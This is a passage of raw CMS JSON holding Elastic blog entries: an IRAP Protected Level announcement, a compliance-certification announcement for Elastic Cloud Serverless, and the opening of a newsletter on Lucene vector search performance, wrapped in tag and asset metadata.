models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"title":"Migrating","label_l10n":"Migrating","keyword":"migrating","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt065c9f1028ecc8ce","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:53.971Z","updated_at":"2020-06-17T03:39:53.971Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:53.971Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-08-18T20:57:42.628Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt47414afcde70b058","ACL":{},"created_at":"2023-11-06T20:43:45.793Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-security","label_l10n":"Open security","tags":[],"title":"Open security","updated_at":"2023-11-06T20:43:45.793Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:27.618Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltdf59d18fa27d1692","ACL":{},"created_at":"2023-11-06T21:34:55.381Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tool-consolidation","label_l10n":"Tool consolidation","tags":[],"title":"Tool consolidation","updated_at":"2023-11-06T21:34:55.381Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.747Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt40e02d1553cb4861","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-08-05T14:37:45.050Z","created_by":"bltb6c155cd84fc0c1a","file_size":"169575","filename":"Opt1_V1.jpg","parent_uid":null,"tags":[],"title":"Opt1_V1.jpg","updated_at":"2024-08-05T14:37:45.050Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.378Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt40e02d1553cb4861/66b0e3b949df09abf05ce3fc/Opt1_V1.jpg"},"title":"Elastic accelerates SIEM data onboarding with Automatic Import powered by Search AI","title_l10n":"Elastic accelerates SIEM data onboarding with Automatic Import powered by Search AI","updated_at":"2025-01-21T21:48:25.532Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/automatic-import-ai-data-integration-builder","publish_details":{"time":"2025-01-21T21:48:31.253Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc00a0dffdc08b4b6","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"We've reached a significant achievement in expanding support for Australian public sector and critical infrastructure customers by completing our assessment against the Information Security Registered Assessors Program (IRAP) at the Protected Level! ","author":["blta886ef48812ea839"],"category":["bltb79594af7c5b4199"],"created_at":"2025-01-21T20:45:38.857Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd814380bb6334af1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic consistently delivers secure, reliable, and compliant solutions. Today, we are thrilled to announce that we have reached a significant achievement in expanding support for our Australian public sector and critical infrastructure customers: We have completed our assessment against the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInformation Security Registered Assessors Program (IRAP) \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eat the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProtected Level\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e!\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What is IRAP? ","_metadata":{"uid":"cs8b74f8297e17a69e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIRAP helps Australian government and public sector and critical infrastructure organizations validate that sufficient controls are in place for their cloud service providers. IRAP is a rigorous assessment framework developed by the Australian Cyber Security Centre (ACSC). It ensures that cloud services meet stringent government security requirements, especially for handling sensitive data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAchieving the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProtected Level\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e means our platform can securely manage sensitive information, including data that is critical to government agencies.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd4783a33ed42780b"}}},{"image":{"image":{"uid":"blted59f255acc65dfd","_version":1,"title":"irap logo.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-21T20:40:24.994Z","updated_at":"2025-01-21T20:40:24.994Z","content_type":"image/png","file_size":"102335","filename":"irap_logo.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-21T21:00:42.394Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blted59f255acc65dfd/67900639a5499b4bc114c614/irap_logo.png"},"_metadata":{"uid":"cse41fd5837ca3afc8"},"caption_l10n":"","alt_text_l10n":"IRAP logo","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":"width-small: 25%"}}},{"title_text":{"title_text":[{"title_l10n":"Why we pursued IRAP assessment","_metadata":{"uid":"cs8bc59e2f0d02b102"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor us, pursuing IRAP wasn’t just about compliance; it was also about reinforcing our commitment to building trust with our customers. With cybersecurity threats evolving daily, we recognize that robust security is not just a feature — it’s a responsibility.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy attaining IRAP certification, we’re proving to organizations in Australia and beyond that our platform meets the highest standards for protecting sensitive information. Whether you’re a government agency, a private enterprise, or a small business with strict security requirements, you can count on us to deliver solutions that prioritize your data’s safety.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What this means for our customers","_metadata":{"uid":"cs19b7d38b44ece07a"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced security assurance:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e IRAP guarantees that Elastic Cloud has undergone rigorous assessments by qualified experts and meets stringent security controls.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSupport for government workloads:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Our platform is now validated to support workloads at the Protected Level, opening new opportunities for collaboration with government agencies.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eOngoing commitment:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e IRAP isn’t a “set it and forget it” milestone. Maintaining compliance requires continuous monitoring, updates, and alignment with evolving security standards.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"What’s the scope of our assessment?","_metadata":{"uid":"csc4af96ae95bacf34"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe assessed all three available cloud service providers — AWS, GCP, and Azure — for the Elastic Cloud to continue to provide flexibility of cloud hosting choice for our customers. Currently, the following regions for Elastic Cloud Hosted are in scope:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGCP:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e gcp-australia-southeast1\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAzure:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e azure-australiaeast\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAWS:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e ap-southeast-2\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs the Elastic Cloud Hosted and Serverless presence in Australia expands, we intend to include those regions within the scope of our IRAP assessment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Looking ahead","_metadata":{"uid":"cs658f24af7ea8d3d5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs exciting as this milestone is, it’s just the beginning. Security and compliance are ongoing commitments, and we’re always looking for ways to enhance our capabilities and deliver even greater value to our customers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo learn more about our full portfolio of compliance certifications, visit our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/trust\"\u003e\u003cspan style='font-size: 12pt;'\u003eTrust Center\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. If you’re curious about how Elastic Cloud can support your organization’s needs, please \u003c/span\u003e\u003ca href=\"https://www.elastic.co/contact\"\u003e\u003cspan style='font-size: 12pt;'\u003econtact us\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e today.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfc188e573a72d666"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9dccb1fdf758d472"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc7ac25794ea11e87"}}}],"publish_date":"2025-01-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt17630d07558c63f6","ACL":{},"created_at":"2023-11-06T21:33:01.038Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"state-local-government","label_l10n":"State \u0026 local government","tags":[],"title":"State \u0026 local government","updated_at":"2023-11-06T21:33:01.038Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.342Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltc4cf7960c3103ef2","_version":1,"title":"irap.jpeg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-21T20:45:37.416Z","updated_at":"2025-01-21T20:45:37.416Z","content_type":"image/jpeg","file_size":"184642","filename":"irap.jpeg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-21T21:00:42.460Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc4cf7960c3103ef2/67900771e92e09422fc648d0/irap.jpeg"},"title":"Building trust through compliance: Achieving IRAP Protected Level assessment for Elastic Cloud","title_l10n":"Building trust through compliance: Achieving IRAP Protected Level assessment for Elastic Cloud ","updated_at":"2025-01-21T21:00:36.645Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/achieving-irap-protected-level-assessment-elastic-cloud","publish_details":{"time":"2025-01-21T21:00:42.143Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt04a8c1ef59294253","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Cloud Serverless has achieved several industry-recognized security and compliance certifications. This milestone reinforces our commitment to security, privacy, and regulatory compliance. ","author":["blt2b87f31037aed281"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2025-01-21T19:49:56.143Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs540a68b192b87927"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe are thrilled to announce that Elastic Cloud Serverless has achieved several significant compliance certifications. This milestone reinforces our commitment to security, privacy, and regulatory compliance. Elastic Cloud Serverless is now audited or certified under the following industry-leading frameworks: SOC 2 Type 2, ISO 27001, ISO 27017, ISO 27018, Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA), and \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCloud Security Alliance (CSA) Security, Trust, Assurance, and Risk (STAR).\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What this means for you","_metadata":{"uid":"cscd530b3bd4ae87fe"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThese certifications demonstrate our dedication to maintaining high standards of security, governance, and data protection. Here’s a brief overview of why each framework matters to you:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSOC 2 Type 2:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e The Elastic Cloud Serverless service meets rigorous standards for security, availability, confidentiality, and privacy.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eISO 27001:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic has established, implemented, maintained, and continually improved upon an information security management system (ISMS). Elastic Cloud Serverless is now certified under that ISMS.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eISO 27017 and 27018:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic has implemented security controls applicable to the provision and use of cloud services as well as measures to protect personal data in the cloud.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePCI DSS:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic Cloud Serverless has demonstrated compliance with all applicable PCI DSS requirements.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eHIPAA:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic Cloud Serverless satisfies the requirements of the HIPAA Security Rule and Breach Notification Rule.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCSA STAR:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e The CSA STAR certification demonstrates our commitment to cloud security best practices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Why it matters","_metadata":{"uid":"cs5c2d54851c13cf9b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAchieving these certifications is a testament to our continued investment in comprehensive security practices and our commitment to protecting your data. In addition to a faster, more flexible way to scale search, security, and observability capabilities — introduced with the general availability of Elastic Cloud Serverless — it also meets the highest standards of security and compliance.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Learn more","_metadata":{"uid":"csa6b6fd39ed7116b4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo learn more about our full portfolio of compliance certifications, visit our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/trust\"\u003e\u003cspan style='font-size: 12pt;'\u003eTrust Center\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are excited to continue providing you with secure, reliable, and compliant cloud services. We will continue to maintain these certifications and expand our portfolio of supported compliance frameworks to position Elastic Cloud Serverless as a trusted solution for search, security, and observability applications.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9d5a6e932fc0a060"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3f95493814396f47"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd1744f3cffdd5f5b"}}}],"publish_date":"2025-01-21","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt9fe4026c50b65a9b","_version":1,"title":"serverless-infosec.jpeg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-21T19:48:37.301Z","updated_at":"2025-01-21T19:48:37.301Z","content_type":"image/jpeg","file_size":"159422","filename":"serverless-infosec.jpeg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-21T20:21:43.352Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9fe4026c50b65a9b/678ffa156f0a081f9c2672fd/serverless-infosec.jpeg"},"title":"Elastic Cloud Serverless achieves major compliance certifications","title_l10n":"Elastic Cloud Serverless achieves major compliance certifications","updated_at":"2025-01-21T20:32:48.555Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-serverless-achieves-major-compliance-certifications","publish_details":{"time":"2025-01-21T20:32:55.608Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfbb95403ca3b54c1","_version":13,"locale":"en-us","ACL":{},"abstract_l10n":"Hello from the Elastic DevRel team! In this newsletter, you’ll find information on upcoming Elastic meetups and events in your region, catch up on product updates and content, and stay up-to-date with everything Elastic-related.","author":["blt45e4796f6aeab23a"],"category":["bltc17514bfdbc519df"],"created_at":"2024-05-09T15:53:03.710Z","created_by":"blt96ac6007eba0a223","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs10b9a7bfaac3db23"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHello from the Elastic DevRel team! Welcome to our latest newsletter blog edition, where you'll find information on upcoming events in your region, catch up on content, and stay up to date with product updates.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this edition, we dive into the latest enhancements and optimizations that boost vector search performance in Elasticsearch and Apache Lucene, making it up to 8x faster and 32x more efficient. We also explore the new Elastic Cloud Vector Search optimized hardware profile that is now available for Elastic Cloud users on GCP.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs86a026d8df08c386"}}},{"title_text":{"title_text":[{"title_l10n":"What’s new?","_metadata":{"uid":"cs065e956dbc7d71ea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElasticsearch and Lucene\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e are getting \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-lucene-vector-database-gains\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eup to 8x faster and 32x more efficient\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with their recent improvements for vector search.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eArchitecture:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Lucene organizes data into segments — immutable units that undergo periodic merging. This structure allows for efficient management of inverted indices that are essential for text search. With vector search, Lucene extends its capabilities to handle multi-dimensional points, employing the hierarchical navigable small world (HNSW) algorithm to index vectors. This approach facilitates scalability, enabling data sets to exceed available RAM size while maintaining performance. Additionally, Lucene's segment-based approach offers lock-free search operations, supporting incremental changes and ensuring visibility consistency across various data structures.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe integration, however, comes with its own challenges. Merging segments requires recomputing HNSW graphs, which incurs index-time overhead. Searches must cover multiple segments, leading to possible latency overhead. Moreover, optimal performance requires scaling RAM as data grows, which may raise resource management concerns.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMulti-threaded search:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e But Lucene's segmented architecture also enables the implementation of multi-threaded search. Elasticsearch’s performance gains come from efficiently searching multiple segments simultaneously. Latency of individual searches is significantly reduced by using the processing power of all available CPU cores. This optimization is particularly beneficial for Hierarchical Navigable Small World (HNSW) searches.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMulti-graph vector search:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e In multi-graph search scenarios, the challenge lies in efficiently navigating individual graphs, while ensuring comprehensive exploration to avoid local minima. To mitigate this, we devised a strategy to intelligently share state between searches, enabling informed traversal decisions based on global and local competitive thresholds.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy synchronizing information exchange and adjusting search strategies accordingly, we achieve significant improvements in search latency while preserving recall rates comparable to single-graph searches. In concurrent search and indexing scenarios, we notice up to 60% reduction in query latencies with this change alone!\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eJava's advancements:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Lucene's vector search implementation relies on fundamental operations like dot product, square, and cosine distance, both in floating point and binary variants. 